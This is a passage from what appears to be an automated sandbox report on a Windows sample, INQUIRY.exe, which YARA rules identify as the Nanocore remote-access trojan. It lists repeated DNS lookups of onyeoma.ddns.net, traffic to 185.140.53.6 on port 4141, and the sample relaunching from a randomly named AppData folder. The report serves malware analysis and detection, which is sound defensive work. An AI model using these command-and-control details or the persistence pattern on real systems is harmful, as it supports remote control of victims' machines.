                        Jan 24, 2022 02:26:18.169574022 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.169717073 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.171817064 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.171910048 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.182816982 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.182945013 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.184248924 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.184344053 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.205626965 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.206738949 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.206780910 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.206845999 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.206892014 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.206940889 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.206984997 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207144976 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.207204103 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207274914 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207302094 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.207343102 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.207381010 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207437992 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.207530975 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207581997 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.207652092 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207707882 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.207720995 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207770109 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.207931042 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.207984924 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.208058119 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.208147049 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.208178043 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.208226919 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.210367918 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.210458040 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.212559938 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.212711096 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.214907885 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.214967012 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.217228889 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.219465017 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.219532013 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.302170992 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.303973913 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.322979927 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.323043108 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.323060989 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.323096991 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.408653021 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.408726931 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.408751965 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.408814907 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.806741953 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.848963022 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:18.955144882 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.955214977 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:18.955285072 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.048304081 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.048371077 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.048412085 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.048435926 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.048449039 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.048531055 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.220488071 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.220556021 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.220593929 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.220628977 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.220659971 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.220700979 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.373760939 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.675708055 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.690229893 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.703892946 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.782453060 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.786777973 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.905107021 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.905241013 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:19.999212027 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:19.999321938 CET498334141192.168.2.4185.140.53.6
                        Jan 24, 2022 02:26:20.301218033 CET414149833185.140.53.6192.168.2.4
                        Jan 24, 2022 02:26:20.301369905 CET498334141192.168.2.4185.140.53.6
                        TimestampSource PortDest PortSource IPDest IP
                        Jan 24, 2022 02:24:20.130364895 CET5912353192.168.2.48.8.8.8
                        Jan 24, 2022 02:24:20.152194977 CET53591238.8.8.8192.168.2.4
                        Jan 24, 2022 02:24:26.604687929 CET5453153192.168.2.48.8.8.8
                        Jan 24, 2022 02:24:26.623925924 CET53545318.8.8.8192.168.2.4
                        Jan 24, 2022 02:24:31.216694117 CET4971453192.168.2.48.8.8.8
                        Jan 24, 2022 02:24:31.236319065 CET53497148.8.8.8192.168.2.4
                        Jan 24, 2022 02:24:37.260209084 CET5802853192.168.2.48.8.8.8
                        Jan 24, 2022 02:24:37.283354044 CET53580288.8.8.8192.168.2.4
                        Jan 24, 2022 02:24:43.306494951 CET5309753192.168.2.48.8.8.8
                        Jan 24, 2022 02:24:43.325751066 CET53530978.8.8.8192.168.2.4
                        Jan 24, 2022 02:24:50.347665071 CET6238953192.168.2.48.8.8.8
                        Jan 24, 2022 02:24:50.367348909 CET53623898.8.8.8192.168.2.4
                        Jan 24, 2022 02:24:56.356394053 CET4991053192.168.2.48.8.8.8
                        Jan 24, 2022 02:24:56.376116037 CET53499108.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:02.409034967 CET5585453192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:02.430704117 CET53558548.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:08.887145996 CET6454953192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:08.907834053 CET53645498.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:14.852178097 CET6315353192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:14.871570110 CET53631538.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:20.936527014 CET5299153192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:20.955882072 CET53529918.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:27.008050919 CET5172653192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:27.027782917 CET53517268.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:33.414751053 CET5653453192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:33.435841084 CET53565348.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:39.569437981 CET5662753192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:39.586961031 CET53566278.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:45.674490929 CET5662153192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:45.694015980 CET53566218.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:51.681771994 CET6311653192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:51.704018116 CET53631168.8.8.8192.168.2.4
                        Jan 24, 2022 02:25:57.978744984 CET5504653192.168.2.48.8.8.8
                        Jan 24, 2022 02:25:57.998338938 CET53550468.8.8.8192.168.2.4
                        Jan 24, 2022 02:26:04.045773983 CET5060153192.168.2.48.8.8.8
                        Jan 24, 2022 02:26:04.066617966 CET53506018.8.8.8192.168.2.4
                        Jan 24, 2022 02:26:10.198947906 CET6087553192.168.2.48.8.8.8
                        Jan 24, 2022 02:26:10.220319033 CET53608758.8.8.8192.168.2.4
                        Jan 24, 2022 02:26:16.618215084 CET5644853192.168.2.48.8.8.8
                        Jan 24, 2022 02:26:16.639257908 CET53564488.8.8.8192.168.2.4
                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Jan 24, 2022 02:24:20.130364895 CET192.168.2.48.8.8.80xf62eStandard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:26.604687929 CET192.168.2.48.8.8.80xcfe8Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:31.216694117 CET192.168.2.48.8.8.80xbee8Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:37.260209084 CET192.168.2.48.8.8.80x8d19Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:43.306494951 CET192.168.2.48.8.8.80xd83cStandard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:50.347665071 CET192.168.2.48.8.8.80x3947Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:56.356394053 CET192.168.2.48.8.8.80xd465Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:02.409034967 CET192.168.2.48.8.8.80x9325Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:08.887145996 CET192.168.2.48.8.8.80xc690Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:14.852178097 CET192.168.2.48.8.8.80xd813Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:20.936527014 CET192.168.2.48.8.8.80xa7baStandard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:27.008050919 CET192.168.2.48.8.8.80x6dd9Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:33.414751053 CET192.168.2.48.8.8.80xd584Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:39.569437981 CET192.168.2.48.8.8.80x3bcStandard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:45.674490929 CET192.168.2.48.8.8.80x5c16Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:51.681771994 CET192.168.2.48.8.8.80xe7efStandard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:57.978744984 CET192.168.2.48.8.8.80xf5f7Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:26:04.045773983 CET192.168.2.48.8.8.80x588dStandard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:26:10.198947906 CET192.168.2.48.8.8.80x7508Standard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        Jan 24, 2022 02:26:16.618215084 CET192.168.2.48.8.8.80x1c3aStandard query (0)onyeoma.ddns.netA (IP address)IN (0x0001)
                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Jan 24, 2022 02:24:20.152194977 CET8.8.8.8192.168.2.40xf62eNo error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:26.623925924 CET8.8.8.8192.168.2.40xcfe8No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:31.236319065 CET8.8.8.8192.168.2.40xbee8No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:37.283354044 CET8.8.8.8192.168.2.40x8d19No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:43.325751066 CET8.8.8.8192.168.2.40xd83cNo error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:50.367348909 CET8.8.8.8192.168.2.40x3947No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:24:56.376116037 CET8.8.8.8192.168.2.40xd465No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:02.430704117 CET8.8.8.8192.168.2.40x9325No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:08.907834053 CET8.8.8.8192.168.2.40xc690No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:14.871570110 CET8.8.8.8192.168.2.40xd813No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:20.955882072 CET8.8.8.8192.168.2.40xa7baNo error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:27.027782917 CET8.8.8.8192.168.2.40x6dd9No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:33.435841084 CET8.8.8.8192.168.2.40xd584No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:39.586961031 CET8.8.8.8192.168.2.40x3bcNo error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:45.694015980 CET8.8.8.8192.168.2.40x5c16No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:51.704018116 CET8.8.8.8192.168.2.40xe7efNo error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:25:57.998338938 CET8.8.8.8192.168.2.40xf5f7No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:26:04.066617966 CET8.8.8.8192.168.2.40x588dNo error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:26:10.220319033 CET8.8.8.8192.168.2.40x7508No error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)
                        Jan 24, 2022 02:26:16.639257908 CET8.8.8.8192.168.2.40x1c3aNo error (0)onyeoma.ddns.net185.140.53.6A (IP address)IN (0x0001)

                        Click to jump to process

                        Click to jump to process

                        Click to dive into process behavior distribution

                        Click to jump to process

                        Start time:02:24:10
                        Start date:24/01/2022
                        Path:C:\Users\user\Desktop\INQUIRY.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                        Imagebase:0x400000
                        File size:315125 bytes
                        MD5 hash:DC0ACC75361BB39FBD4ABEC6EDC82CD5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.665449354.00000000022E0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:low

                        Start time:02:24:12
                        Start date:24/01/2022
                        Path:C:\Users\user\Desktop\INQUIRY.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\INQUIRY.exe"
                        Imagebase:0x400000
                        File size:315125 bytes
                        MD5 hash:DC0ACC75361BB39FBD4ABEC6EDC82CD5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000002.00000000.662575253.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.918404744.0000000002522000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.917467270.0000000000774000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.916471993.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000002.00000000.663644960.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.918375056.00000000024E0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.918797240.00000000039A2000.00000004.00000001.sdmp, Author: Joe Security
                        Reputation:low

                        Start time:02:24:23
                        Start date:24/01/2022
                        Path:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
                        Imagebase:0x400000
                        File size:315125 bytes
                        MD5 hash:DC0ACC75361BB39FBD4ABEC6EDC82CD5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.704939952.0000000002300000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low

                        Start time:02:24:29
                        Start date:24/01/2022
                        Path:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
                        Imagebase:0x400000
                        File size:315125 bytes
                        MD5 hash:DC0ACC75361BB39FBD4ABEC6EDC82CD5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725072072.0000000002510000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725158787.00000000038D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725196610.000000000390A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725133013.00000000028DE000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.701936247.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.724570206.00000000006C5000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000000.702725030.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000004.00000002.725281266.00000000049D2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:low

                        Start time:02:24:31
                        Start date:24/01/2022
                        Path:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
                        Imagebase:0x400000
                        File size:315125 bytes
                        MD5 hash:DC0ACC75361BB39FBD4ABEC6EDC82CD5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Florian Roth
                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: NanoCore, Description: unknown, Source: 00000005.00000002.719731750.0000000002400000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                        Reputation:low

                        Start time:02:24:37
                        Start date:24/01/2022
                        Path:C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\sspgadrjncoy\rstmgknbahw.exe"
                        Imagebase:0x400000
                        File size:315125 bytes
